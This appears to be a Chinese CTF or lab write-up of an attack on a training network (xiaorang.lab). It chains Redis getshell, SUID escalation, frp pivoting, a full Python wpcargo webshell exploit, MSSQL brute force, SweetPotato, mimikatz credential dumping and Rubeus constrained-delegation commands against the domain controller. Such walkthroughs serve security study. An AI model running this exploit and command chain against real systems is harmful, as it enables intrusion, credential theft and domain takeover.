fscan扫一遍,发现存在redis未授权漏洞

img

用脚本getshell

img

发现没有权限读flag,发现可以利用base64命令suid提权

img

img

img

传个fscan上去扫一下内网

img

搭建frp

img

img

先尝试攻击搭建了wordpress的那台主机

wpscan扫一遍,扫出来有个wpcargo插件

img

用脚本写入木马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

img

用蚁剑连接,连接类型选cmdlinux

img

在wp-config.php中可以找到数据库的账号密码,连接数据库找到第二个flag和提示,给了一些密码,保存下来做成一个字典

img

img

img

img

然后用得到的字典尝试爆破之前扫到的mssql服务器的密码,成功找到正确的

img

用MUDT成功连接,上传甜土豆提权

img

img

添加用户并添加到管理组

img

img

远程桌面连接,找到flag3

img

接下来是约束委派攻击

上传mimikatz获取用户哈希

1
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit

img

用rubeus获取到TGT

1
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:xxx /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

img

用这个TGT申请获取域控CIFS服务的TGS票据,并注入内存

1
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:xxx

img

获取域控中的flag

img